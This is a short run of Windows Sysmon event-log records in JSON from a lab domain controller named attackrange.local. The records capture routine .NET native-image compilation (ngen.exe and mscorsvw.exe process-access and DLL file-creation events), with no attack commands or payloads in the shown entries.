{"EventTime":"2020-08-01 07:02:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8669,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:42.748\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-001050AE0F00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:42.748","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-001050AE0F00}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8670,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:42.748\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-001050AE0F00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:42.748","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-001050AE0F00}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8671,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:43.279\r\nProcessGuid: {E2A3D6B1-1392-5F25-0000-0010DA171000}\r\nProcessId: 1364\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\554-0\\System.Web.DynamicData.dll\r\nCreationUtcTime: 2020-08-01 07:02:43.279","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:43.279","ProcessGuid":"{E2A3D6B1-1392-5F25-0000-0010DA171000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\554-0\\System.Web.DynamicData.dll","CreationUtcTime":"2020-08-01 07:02:43.279","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8672,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.326\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-00108EB10F00}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.326","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-00108EB10F00}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8673,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.326\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-00108EB10F00}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.326","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-00108EB10F00}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8674,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-00108EB10F00}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-00108EB10F00}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8675,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.373\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-001026B50F00}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.373","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-001026B50F00}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8676,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.373\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-001026B50F00}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.373","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-001026B50F00}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8677,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-0010D7201000}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-0010D7201000}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
